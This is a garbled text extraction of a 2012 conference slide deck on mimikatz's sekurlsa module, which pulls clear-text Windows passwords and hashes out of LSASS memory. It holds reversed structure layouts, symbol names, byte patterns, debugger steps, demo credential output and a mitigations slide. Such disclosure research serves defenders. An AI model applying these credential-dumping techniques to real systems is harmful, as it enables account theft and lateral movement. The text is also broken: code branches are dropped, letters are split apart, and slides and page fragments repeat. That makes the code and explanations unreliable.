Mimikatz Phdays

mimikatz
Benjamin DELPY `gentilkiwi`

focus on sekurlsa / pass-the-pass
Who ? Why ?
Benjamin DELPY `gentilkiwi`
French
26y
Kiwi addict
Lazy programmer
Started to code mimikatz to :

explain security concepts ;
improve my knowledge ;
prove to Microsoft that sometimes they must change old habits.
Why all in French ?

because Im
It limits script kiddies usage.
8/21/2014
Benjamin DELPY `gentilkiwi` @ PHDays 2012
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz
working
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
x86 & x64
partial support for 8 & Server 8 (few kernel driver bugs ;))
2000 support dropped with mimikatz 1.0
Everywhere ; its statically compiled

Two modes
direct action (local commands)
m
i
m
i
k
a
t
z
.
e
x
e
8/21/2014
process or driver communication
KeyIso
m
i
m
i
k
a
t
z
.
e
x
e
Isolation de cl CNG
LSASS.EXE
Direct action :
crypto::patchcng
EventLog
Journal dvnements Windows
SVCHOST.EXE
Direct action :
divers::eventdrop
SamSS
Gestionnaire de comptes de scurit
LSASS.EXE
VirtualAllocEx,
WriteProcessMemory,
CreateRemoteThread...
sekurlsa.dll
Open a pipe
Write a welcome message
Wait commands and return results
mimikatz
architecture
all in VC/C++ 2010 with some ASM
mod_mimikatz_standard
mod_parseur
mod_mimikatz_winmine
mod_text
mod_mimikatz_divers
mod_memory
mod_mimikatz_nogpo
mod_secacl
mod_mimikatz_impersonate
mod_pipe
mod_mimikatz_inject
mod_inject
mod_mimikatz_samdump
mod_hive
mod_mimikatz_crypto
mod_crypto
mod_mimikatz_handle
mod_patch
mod_mimikatz_privilege
mod_privilege
mod_mimikatz_system
mod_system
mod_mimikatz_service
mod_service
mod_mimikatz_process
mod_process
wdigest
mod_mimikatz_thread
mod_thread
livessp
mod_mimikatz_terminalserver
mod_ts
kerberos
KiwiCmd.exe
KiwiRegedit.exe
m
i
m
i
k
a
t
z
.
e
x
e
8/21/2014
mimikatz.sys
KiwiTaskmgr.exe
kappfree.dll
kelloworld.dll
sam
klock.dll
secrets
msv_1_0
sekurlsa.dll
tspkg
mimikatz :: sekurlsa
what is it ?
My favorite library !
A thread that waits, in LSASS, commands from mimikatz (or mubix
meterpreter)
What sekurlsa can do from the inside ?
Dump system secrets
Dump SAM / DC base
Dump clear text passwords/hashes
from interactive sessions
MSV1_0 (dump/inject/delete)
TsPkg
WDigest
LiveSSP
Kerberos
Lets start an injection & pass the hash !

8/21/2014
history of pass-the-* 1/2
Pass-the-hash
1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)
2000 - Private version of a Windows LSA Logon Session Editor ; Hernan
Ochoa (CoreSecurity)
2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and
provide some downloads of it
2007 - Pass the hash toolkit published ; Hernan Ochoa (CoreSecurity)
2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86
& x64 versions of Windows (yeah, by myself but in French; so not famous ;))
2007 was the year of pass the hash !
Pass-the-ticket
04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support; Hernan Ochoa (Ampliasecurity)
8/21/2014
history of pass-the-* 2/2
Pass-the-pass
05/2011 mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited
to NT 6 and some XP SP3)
http://blog.gentilkiwi.com/securite/pass-the-pass
05/2011 return of mimikatz ; it dumps clear text passwords from WDigest provider
(unlimited this time ;))
http://blog.gentilkiwi.com/securite/re-pass-the-pass
05/2011 Some organizations opened cases to Microsoft about it

Lots of time
begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz
03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest
password extract
http://seclists.org/pen-test/2012/Mar/7
03/2012 mimikatz strikes again with LiveSSP provider and extracts Live login passwords
from Windows 8 memory
http://blog.gentilkiwi.com/securite/rere-pass-the-pass
03/2012 yeah, once again, more curious but Kerberos keeps passwords in memory
http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
8/21/2014
lets take a moment
You noticed ?
It has been one year since Microsoft has been notified
about passwords extraction from LSASS
Without any reaction
But blacklisting mimikatz from MSE and FEP at 20120228 ;)
8/21/2014
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough

8/21/2014

what is it ?
Microsoft introduces SSO capability for Terminal Server with

NT 6 to improve RemoteApps and RemoteDestkop userss
experience
http://technet.microsoft.com/library/cc772108.aspx
Rely on CredSSP with Credentials Delegation (!= Account

delegation)
Specs : http://download.microsoft.com/download/9/5/e/95ef66af9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression : it seems cool

User does not have to type its password
Password is not in RDP file
Password is not in user secrets
8/21/2014
10

demo time !
Explanations follow
8/21/2014
11

questions ?
KB says that for it works, we must enable Default
credentials
Default credentials : The credentials obtained when

Windows - https://msdn.microsoft.com/library/bb204773.aspx
delegation
the user first logs on to
What ? Our User/Domain/{Password | Hash | Ticket} ? It seems

In all cases, system seems to be vulnerable to pass-the-*
In what form ?
Our specs : [MS-CSSP]
2.2.1.2.1 TSPasswordCreds
The TSPasswordCreds structure contains the user's password credentials that are delegated
to the server. (or PIN)
TSPasswordCreds ::= SEQUENCE {
domainName [0] OCTET STRING,
userName [1] OCTET STRING,
password [2] OCTET STRING
}
Challenge / response for authentication ?

Serveur : YES (TLS / Kerberos)
Client : NO ; *password* is sent to server
So password resides somewhere in memory ?

8/21/2014
12

symbols & theory
Lets explore some symbols !

kd> x tspkg!*clear*
75016d1c
tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68
tspkg!TSDuplicatePassword = <no type information>
75011cd4
tspkg!TSHidePassword = <no type information>
750195ee
tspkg!TSRevealPassword = <no type information>
75012fbd
tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b
tspkg!TSCredTableLocateDefaultCreds = <no type information>
sounds cool (thanks Microsoft)
Lets imagine a scenario

Enumerate all sessions to obtain informations :
Username
Domain
LUID
Call tspkg!TSCredTableLocateDefaultCreds with LUID to obtain :
TS_CREDENTIAL
Call tspkg!TSObtainClearCreds with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :
8/21/2014
TS_PRIMARY_CREDENTIAL with clear text credentials

13

test & data
LsaEnumerateLogonSessions
for each LUID
tspkg!TSCredTableLoca
teDefaultCreds
tspkg!TSObtainClearCr
eds
password
in clear ?
8/21/2014
14

test & structures
lazy way
for each LUID
typedef struct _KIWI_TS_CREDENTIAL {

#ifdef _M_X64
BYTE unk0[0x88];
#elif defined _M_IX86
BYTE unk0[0x50];
#endif
PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
tspkg!TSCredTableLoca
teDefaultCreds
KIWI_TS_CREDEN
TIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {

PVOID unk0;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL,
*PKIWI_TS_PRIMARY_CREDENTIAL;
KIWI_TS_PRIMAR
Y_CREDENTIAL
tspkg!TSObtainClearCr
eds
KIWI_TS_PRIMAR
Y_CREDENTIAL
8/21/2014
password
in clear ?
15

first result
It worked !
Since old Windowss version I hadnt seen my Windows password
Ive been a little bit afraid
After many hesitations, I published a post and a stable tool update

on my blog at 20110508
http://blog.gentilkiwi.com/securite/pass-the-pass
But some issues :

& tspkg!TSObtainClearCreds are not exported
tspkg!TSObtainClearCreds not always present
Calling conventions can be a problem
Only NT6 and few XP SP3 (manual provider activation)
tspkg!TSCredTableLocateDefaultCreds
8/21/2014
16

final implementation
for each LUID
KIWI_TS_CREDENTI
AL_AVL_SEARCH
tspkg!TSGlobal
CredTable
RtlLookupElementGenericTabl
eAvl
typedef struct _KIWI_TS_CREDENTIAL {

#ifdef _M_X64
BYTE unk0[0x88];
BYTE unk0[0x50];
#endif
PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
KIWI_TS_CREDEN
TIAL
KIWI_TS_PRIMAR
Y_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {

PVOID unk0;
} KIWI_TS_PRIMARY_CREDENTIAL,
*PKIWI_TS_PRIMARY_CREDENTIAL;
LsaUnprotectMemory
password
in clear !
8/21/2014
typedef struct _KIWI_TS_CREDENTIAL_AVL_SEARCH {

#ifdef _M_X64
BYTE unk0[108];
BYTE unk0[64];
#endif
LUID LocallyUniqueIdentifier;
#ifdef _M_X64
BYTE unk1[46];
BYTE unk1[16];
#endif
} KIWI_TS_CREDENTIAL_AVL_SEARCH,
*PKIWI_TS_CREDENTIAL_AVL_SEARCH;
17

demo time !
8/21/2014
18

final result
It works better ;)
No orphan referenced credentials
More logic approach (We will see that latter)
We have just to find :

tspkg!TSGlobalCredTable
SeckPkgFunctionTable->LsaUnprotectMemory
LSA_SECPKG_FUNCTION_TABLE :
http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx
LsaUnprotectMemory :
http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx
Find this
We all have personal convictions to search unexported data :
Hardcoded addresses / offsets ( ) ;

Disassembly engine ;
Pattern matching ;
8/21/2014
19
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool

8/21/2014
20

what is it ?
Digest access authentication is one of the agreed-upon methods a
web server can use to negotiate credentials with a user's web
browser. It applies a hash function to a password before sending it
over the network []
Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication
Common Digest Authentication Scenarios :

Authenticated client access to a Web site
Authenticated client access using SASL
Authenticated client access with integrity protection to a directory service
using LDAP
Microsoft : http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool

No password over the network, just hashes
No reversible password in Active Directory ; hashes for each realm
Only with Advanced Digest authentication
8/21/2014
21

what is it ?
We speak about hashes, but what hashes ?

H = MD5(HA1:nonce:[]:HA2)
HA1 = MD5(username:realm:password)
HA2 = MD5(method:digestURI:[])
Even after login, HA1 may change realm is from server

side and cannot be determined before Windows logon
WDigest provider must have elements to compute
responses for different servers :

Username
Realm (from server)
Password
8/21/2014
22

theory
This time, we know :
that WDigest keeps password in memory by protocol for HA1 digest
that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory
At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
Lets perform a research in WDigest :
.text:7409D151 _DigestCalcHA1@8
call
dword ptr [eax+0B4h]
Hypothesis seems verified
LsaProtectMemory
At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
Lets perform a research in WDigest :
.text:74096C69 _SpAcceptCredentials@16 call
dword ptr [eax+0B0h]
SpAcceptCredentials takes clear password in args

Protect it with LsaProtectMemory
Update or insert data in double linked list : wdigest!l_LogSessList
8/21/2014
23

test & data
for each LUID
wdigest!l_LogS
essList
search linked list for LUID
LsaUnprotectMemory
password
in clear ?
8/21/2014
24

for each LUID

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
DWORD UsageCount;
struct _KIWI_WDIGEST_LIST_ENTRY *This;
LUID
LocallyUniqueIdentifier;
[]
[]
} KIWI_WDIGEST_LIST_ENTRY,
*PKIWI_WDIGEST_LIST_ENTRY;
wdigest!l_LogS
essList
KIWI_WDIGEST_L
IST_ENTRY
LsaUnprotectMemory
password
in clear !
8/21/2014
25

demo time !
8/21/2014
26

result
It works again !
This time we just have to find :
wdigest!l_LogSessList
LSA_SECPKG_FUNCTION_TABLE :
http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx
LsaUnprotectMemory :
http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx
Seems generalizable ?
8/21/2014
27
and now what ?
In fact, with TsPkg and WDigest, passwords can be

retrieved from any version of Windows ...
WDigest
XP, 2003
Vista / Seven / 2008 / 2008r2
8
But not with a Live account
TsPkg
XP SP3 (manual install)
Vista / Seven / 2008 / 2008r2
8
Even with a Live account
8/21/2014
28
and now what ?
wce had not copied my TsPkg functionalities

Only WDigest, so they missed 8 Live accounts
Kiwi WDigest patterns (last public release)

#ifdef _M_X64
BYTE ptrInsertInLogSess[] = {0x4C, 0x89, 0x1B, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5B, 0x08, 0x48, 0x8D};
BYTE ptrInsertInLogSess[] = {0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04};
#endif
wce patterns
Between ~17 occurrences of wdigest!l_LogSessList, maybe a coincidence
for lack of TsPkg, they can be inspired by next releases ?

8/21/2014
29
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks

8/21/2014
30

how ?
Actually Ive only used logical (empirical) approach to

search passwords :
Protocol reading
Symbols searching
~ Boring ~ be more brutal this time : make a WinDBG trap !

0: kd> !process 0 0 lsass.exe
PROCESS 83569040 SessionId: 0 Cid: 0224
Peb: 7f43f000 ParentCid: 01b4
DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible>
Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc
int
3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g
8/21/2014
31

how ?
Lets login with a Live account on Windows 8 !

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
Our LiveSSP provider
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
Yeah, Pass the Hash capability with Live

account too
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
Live user can logon through RDP via SSO
1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
livessp!LsaApLogonUserEx2+0x560 (74781a96):
call to livessp!LiveCreateLogonSession (74784867)
After credentials protection, LsaApLogonUserEx2 calls

LiveCreateLogonSession to insert data in
LiveGlobalLogonSessionList (similar to WDigest)
8/21/2014
32

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
PVOID unk0;
PVOID unk1;
PVOID unk2;
PVOID unk3;
DWORD unk4;
DWORD unk5;
PVOID unk6;
PVOID unk7;
PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY,
*PKIWI_LIVESSP_LIST_ENTRY;
for each LUID
livessp!LiveGloba
lLogonSessionList
KIWI_LIVESSP_LIS
T_ENTRY
KIWI_LIVESSP_PRI
MARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {

DWORD isSupp;
DWORD unk0;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL,
*PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
LsaUnprotectMemory
password
in clear !
8/21/2014
33

demo time !
8/21/2014
34
it was a cool trap no ?
Even if we already have tools for normal accounts, are you

not curious to test one with this trap ?*
* Me, yes
8/21/2014
35
mimikatz :: sekurlsa :: kerberos

Lets login normal account
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
Kerberos, ticket part ? Maybe ;)
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
Kerberos part for password ??????
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
wdigest!SpAcceptCredentials
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
After credentials protection, KerbCreateLogonSession calls :

NT6 ; KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
NT5 ; KerbInsertLogonSession to insert data in
KerbLogonSessionList
8/21/2014
36
mimikatz :: sekurlsa :: kerberos (nt 6)

typedef struct _KIWI_KERBEROS_LOGON_AVL_SEARCH {
#ifdef _M_X64
BYTE unk0[64];
BYTE unk0[36];
#endif
} KIWI_KERBEROS_LOGON_AVL_SEARCH,
*PKIWI_KERBEROS_LOGON_AVL_SEARCH;
for each LUID
Kerberos!KerbG
lobalLogonSess
ionTable
KIWI_KERBEROS_LO
GON_AVL_SEARCH
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
DWORD unk0;
PVOID unk1;
PVOID unk2;
#ifdef _M_X64
BYTE unk3[96];
BYTE unk3[68];
#endif
} KIWI_KERBEROS_PRIMARY_CREDENTIAL,
*PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
RtlLookupElementGenericTabl
eAvl
KIWI_KERBEROS_PR
IMARY_CREDENTIAL
LsaUnprotectMemory
password
in clear !
8/21/2014
37
mimikatz :: sekurlsa :: kerberos (nt 5)

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
DWORD UsageCount;
PVOID unk0;
PVOID unk1;
PVOID unk2;
DWORD unk3;
DWORD unk4;
PVOID unk5;
PVOID unk6;
PVOID unk7;
#ifdef _M_IX86
DWORD unk8;
#endif
DWORD unk9;
DWORD unk10;
PVOID unk11;
DWORD unk12;
DWORD unk13;
PVOID unk14;
PVOID unk15;
PVOID unk16;
[]
} KIWI_KERBEROS_LOGON_SESSION,
*PKIWI_KERBEROS_LOGON_SESSION;
for each LUID
kerberos!KerbLog
onSessionList
KIWI_LIVESSP_PRI
MARY_CREDENTIAL
LsaUnprotectMemory
password
in clear !
8/21/2014
38

demo time !
8/21/2014
39

hu ?
Ok It works*
But why ?
*Not at all logon on NT5
*Can need an unlock
From my understanding of Microsoft explanations, no need of

passwords for the Kerberos protocol all is based on the hash
(not very sexy too)
8/21/2014
40

BONUS hu ?
Microsofts implementation of Kerberos is full of logical

For password auth :
password hash for shared secret, but keeping password in
memory
For full smartcard auth :

No password on client
No hash on client ?
NTLM hash on client
KDC sent it back as a gift
8/21/2014
41
why this is dangerous ?
Not a bug
Not a weakness
Not a vulnerability
Not a 0-day
(for now, there may be too)
Its normal that LSASS keeps passwords in memory for passwords based
providers when protocols need them
And hashes for msv1_0
All of these rely on shared secrets
So you cant prevent Windows internal behaviors (in a supported way)

One change from Microsoft on protocols can impact all versions
I dont count on a fix or others things in the next [5;10] years

8/21/2014
42
what we can do ?
Basics
No physical access to computer (first step to pass the hash)

No admin rights / system rights / debug privileges ()
Disable local admin accounts
Strong passwords (haha, it was a joke)
Network login instead of interactive (when possible)
Audit ; pass the hash keeps traces and can lock accounts
No admin rights / system rights / debug privileges, even VIP
More in depth
Force strong authentication (SmartCard & Token) : $ /

Short validity for Kerberos tickets
No delegation
Disable NTLM (available with NT6)
No exotic :
biometrics (it keeps password somewhere and push it to Windows)

single sign on
Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
Let opportunities to stop retrocompatibility
Disable faulty providers ?
8/21/2014
Is it supported by Microsoft ?
Even if, you will disable Kerberos and msv1_0 ?
43
Code it ! Implement it in Meta ! Discover !
Pass the hash :

Package
Symbols
Description
msv1_0
SeckPkgFunctionTable->GetCredentials
Get clear LM & NTLM hashes from LUID
msv1_0
SeckPkgFunctionTable->LsaProtectMemory
SeckPkgFunctionTable->AddCredential
Push clear LM & NTLM hashes to LUID
msv1_0
SeckPkgFunctionTable->DeleteCredential
Delete hashes from LUID
Get passwords :
Package
Symbols
Type
tspkg
tspkg!TSGlobalCredTable
RTL_AVL_TABLE
wdigest
wdigest!l_LogSessList
LIST_ENTRY
livessp
livessp!LiveGlobalLogonSessionList
LIST_ENTRY
kerberos
(nt5)
kerberos!KerbLogonSessionList
LIST_ENTRY
kerberos
(nt6)
Kerberos!KerbGlobalLogonSessionTable
RTL_AVL_TABLE
8/21/2014
44
little help to start !
Package
Datas
Little help
@getLogonPasswords
Use full keyword in argument of functions
msv1_0
@getMSV
@getMSVFunctions
msv1_0 :
* Utilisateur
* Domaine
* Hash LM
* Hash NTLM
tspkg
wdigest
livessp
kerberos
8/21/2014
:
:
:
:
termuser
DEMO
d0e9aee149655a6075e4540af1f22d3b
cc36cf7a8514893efccd332446158b1a
** lsasrv.dll ** ; Statut recherche : OK :) 3

@GetCredentials
= 000007F9C1C62938
@AddCredential
= 000007F9C1C71010
@DeleteCredential
= 000007F9C1C61F58
@LsaUnprotectMemory = 000007F9C1C59960
@LsaProtectMemory
= 000007F9C1C628A4
@getTsPkg
@getTsPkgFunctions
tspkg :
* Utilisateur : termuser
* Domaine
: DEMO
* Mot de passe : waza1234/
** tspkg.dll/lsasrv.dll ** ; Statut recherche : OK :)

@TSGlobalCredTable = 000007F9C1557B20
@getWDigest
@getWDigestFunctions
wdigest :
* Domaine
: DEMO
** wdigest.dll/lsasrv.dll ** ; Statut recherche : OK :)

@l_LogSessList
= 000007F9C15E12B0
@getLiveSSP
@getLiveSSPFunctions
livessp :
* Utilisateur : sekurlsa@live.fr
* Domaine
: ps:password
** livessp.dll/lsasrv.dll ** ; Statut recherche : OK :)

@LiveGlobalLogonSessionList = 000007F9C14E8C68
@LsaUnprotectMemory
= 000007F9C1C59960
@getKerberos
@getKerberosFunctions
kerberos :
* Domaine
: DEMO.LOCAL
** kerberos.dll/lsasrv.dll ** ; Statut recherche : OK :)

@KerbGlobalLogonSessionTable = 000007F9C1955AE0
@KerbLogonSessionList
= 0000000000000000
@LsaUnprotectMemory
= 000007F9C1C59960
45
some ideas
Meterpreter post module
Standalone binary without injection

yeah, its easy !
read all data (sessions, encrypted passwords)
read all keys and implement your own (un)protectMemory routine !
decrypt / crypt
Extract all of this from memory dump / hyberfile !

etc
Make demonstrations to your chief information security

officer
Ask Microsoft to work on better implementation
Maybe offer possibilities to disable or not some functionalities
Think globally about data really needed for authentication
8/21/2014
46
some ideas
Meterpreter post module
Standalone binary without injection

yeah, its easy !
read all data (sessions, encrypted passwords)
read all keys and implement your own (un)protectMemory routine !
decrypt / crypt
Extract all of this from memory dump / hyberfile !

etc
Make demonstrations to your chief information security

officer
Ask Microsoft to work on better implementation
Maybe offer possibilities to disable or not some functionalities
Think globally about data really needed for authentication
8/21/2014
47
mimikatz
what else ?
Crypto
mod_mimikatz_crypto
mod_crypto
Export non-exportable certificates and keys

CryptoAPI
CNG
Stop event monitoring

Basic GPO bypass
Applocker / SRP bypass
Driver
mod_mimikatz_divers
mod_mimikatz_nogpo
kappfree.dll
mimikatz.sys
Play with tokens & privileges

Display SSDT x86 & x64
List minifilters actions
List Notifications (process / thread / image / registry)
List Objects hooks and procedures
8/21/2014
48
mimikatz
thats all folks !
Thanks to / :
my girlfriend for her support (her LSASS crashed few times)

Positive Technologies to offer me this great opportunity
Microsoft to consider it as normal/acceptable
Security friends/community for their ideas & challenges
You, for your attention !
Questions ?
Dont be shy ;)
especially if you have written the corresponding slide number
8/21/2014
49
mimikatz
source code
Not now available

Im not proud of mixing C/C++ and STL in LSASS
Script kiddies will use it without understanding
But a little part of it for pass the pass available

So download it on mimikatz download page
http://blog.gentilkiwi.com/mimikatz
8/21/2014
50
Blog & Contact
blog/mimikatz : http://blog.gentilkiwi.com/mimikatz
email :
benjamin@gentilkiwi.com
Twitter :
@gentilkiwi
8/21/2014
51

Mimikatz Phdays

Uploaded by

Copyright:

Available Formats

Mimikatz Phdays

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Mimikatz Phdays

Uploaded by

Copyright:

Available Formats

mimikatz

Benjamin DELPY `gentilkiwi`

Started to code mimikatz to :

Why all in French ?

Benjamin DELPY `gentilkiwi` @ PHDays 2012

Everywhere ; its statically compiled

process or driver communication

Benjamin DELPY `gentilkiwi` @ PHDays 2012

Lets start an injection & pass the hash !

Benjamin DELPY `gentilkiwi` @ PHDays 2012

2007 was the year of pass the hash !

Benjamin DELPY `gentilkiwi` @ PHDays 2012

05/2011 Some organizations opened cases to Microsoft about it

Benjamin DELPY `gentilkiwi` @ PHDays 2012

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

because sometimes hash is not enough

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

Microsoft introduces SSO capability for Terminal Server with

Rely on CredSSP with Credentials Delegation (!= Account

First impression : it seems cool

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

Default credentials : The credentials obtained when

the user first logs on to

What ? Our User/Domain/{Password | Hash | Ticket} ? It seems

Challenge / response for authentication ?

So password resides somewhere in memory ?

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

Lets explore some symbols !

sounds cool (thanks Microsoft)

Lets imagine a scenario

Call tspkg!TSCredTableLocateDefaultCreds with LUID to obtain :

Call tspkg!TSObtainClearCreds with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :

TS_PRIMARY_CREDENTIAL with clear text credentials

mimikatz :: sekurlsa :: tspkg

for each LUID

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

for each LUID

typedef struct _KIWI_TS_CREDENTIAL {

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

Since old Windowss version I hadnt seen my Windows password

Ive been a little bit afraid

After many hesitations, I published a post and a stable tool update

But some issues :

Benjamin DELPY `gentilkiwi` @ PHDays 2012

mimikatz :: sekurlsa :: tspkg

for each LUID

typedef struct _KIWI_TS_CREDENTIAL {

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {

Benjamin DELPY `gentilkiwi` @ PHDays 2012